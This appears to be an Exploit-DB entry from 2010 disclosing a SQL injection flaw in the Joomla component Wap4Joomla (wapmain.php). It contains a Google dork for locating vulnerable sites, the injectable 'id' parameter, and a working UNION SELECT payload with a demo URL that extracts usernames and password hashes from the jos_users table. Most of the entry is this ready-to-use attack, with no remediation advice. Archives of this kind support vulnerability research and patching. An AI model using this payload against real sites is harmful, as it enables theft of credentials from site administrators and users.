Joomla! Component Wap4Joomla! - 'wapmain.php' SQL Injection

EDB-ID:

12440

CVE:

N/A


Author:

Manas58

Type:

webapps


Platform:

PHP

Date:

2010-04-28


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability  
      
###########################  
      
Author    : Manas58 
   
Homepage  : http://www.1923turk.com   
  
Script    : Joomla  http://www.joomlaos.de/Downloads/Joomla_und_Mambo_Komponenten/Wap4Joomla.html 
  
Download  : http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,2088.html  

Dork      : inurl:wapmain.php?option=      
###########################    
        
[ Vulnerable File ] 
 
    
wap/wapmain.php?option=onews&action=link&id= [ SQL ]  
         
    
[ XpL ]  
      
-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
  
[ Demo] 
 
http://xxxxx/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--


  
##############################################################    
# 
# Gamoscu: http://gamoscu.wordpress.com/
#
# Baybora: http://baybora.wordpress.com/
#
# Delibey - Tiamo - Psiko - Turco - infazci - X-TRO 
#
#
#
#
#   
##############################################################